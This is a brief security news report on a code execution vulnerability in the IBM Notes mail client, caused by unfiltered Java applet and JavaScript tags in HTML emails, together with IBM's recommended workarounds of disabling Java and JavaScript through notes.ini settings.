14 DAY TRIAL // Researchers from n.runs have identified an arbitrary code execution vulnerability in IBM’s Notes (formerly Lotus Notes), the popular desktop client for social business. The 8.0.x, 8.5.x, 9.0 versions of the application are impacted.
According to experts, because the Notes mail client accepts Java applet and JavaScript tags inside HTML emails without filtering them, it’s possible for an attacker to load Java applets from remote locations.
“Combined with known Java sandbox escape vulnerabilities, it can be used to fully compromise the user reading the email,” experts wrote in a post on Full Disclosure.
IBM has been notified of the security hole and a fix will be rolled out these days.
In the meantime, IBM advises users to disable Java applets, Java access from JavaScript, and JavaScript. Another workaround involves setting the EnableJavaApplets, EnableLiveConnect and EnableJavaScript variables from the notes.ini file to 0.